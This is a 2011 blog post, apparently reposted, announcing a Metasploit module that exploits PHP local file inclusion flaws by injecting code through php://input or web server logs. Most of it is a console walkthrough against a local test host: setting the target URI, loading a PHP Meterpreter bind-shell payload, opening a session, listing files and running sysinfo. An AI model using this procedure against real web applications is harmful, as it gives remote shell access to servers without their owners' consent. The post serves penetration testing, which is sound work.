Metasploit PHP LFI exploit module

Posted by | Saturday, June 11, 2011  at 11:15 AM
1 comments
Labels :



Last week I wrote a simple exploit module for Metasploit to attack PHP applications with LFI vulnerabilities.

It uses php://input to inject the code or the webserver logs in other case.

If I had time, I would like to implement some tricks,  like injection PHP code in the SSH logs or the e-mail server logs, but it is not possible by now :)

Note: It is really buggy and the injection may not be successful, depending on the length of the payload. Please remember that PHP limits the size of the POST message and a long payload may be cut. The same problem applies to the log file injection.

msf exploit(handler) > use exploit/unix/webapp/php_lfi
msf exploit(php_lfi) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_lfi) > set RPORT 8181
RPORT => 8181
msf exploit(php_lfi) > set URI /index.php?foo=xxLFIxx
URI => /index.php?foo=xxLFIxx

msf exploit(php_lfi) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_lfi) > exploit -z


[*] Started bind handler
[*] Trying generic exploits
[*] Clean LFI injection
[*] Sending stage (31612 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:19412 -> 127.0.0.1:4444) at Tue May 24 14:47:29 +0200 2011

C[-] Exploit exception: Interrupt
[*] Session 10 created in the background.
msf exploit(php_lfi) > sessions -i 1
[*] Starting interaction with 1…



meterpreter > ls


Listing: /usr/home/test/cherokee/www
=====================================


Mode              Size  Type  Last modified                   Name
—-              —-  —-  ————-                   —-
100644/rw-r–r–  0     fil   Tue May 10 11:09:39 +0200 2011  foo.php
40755/rwxr-xr-x   512   dir   Tue May 10 10:53:59 +0200 2011  images
100644/rw-r–r–  1795  fil   Tue May 10 10:19:23 +0200 2011  index.html
100644/rw-r–r–  37    fil   Tue May 10 13:52:25 +0200 2011  index.php



meterpreter > sysinfo  
OS          : FreeBSD redphantom.skynet.ct 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
Computer    : redphantom.skynet.ct
Meterpreter : php/php  
meterpreter > exit

Source : http://www.shellguardians.com/2011/05/metasploit-php-lfi-exploit-module.html

1 comments:
krit said...

Good article for me thx alot

Post a Comment

Subscribe to: Post Comments (Atom)
 
2012 upshell | Header Image by Game Wallpapers
Avatar Gamezine Designed by Cheapest Tablet PC
Supported by Phones 4u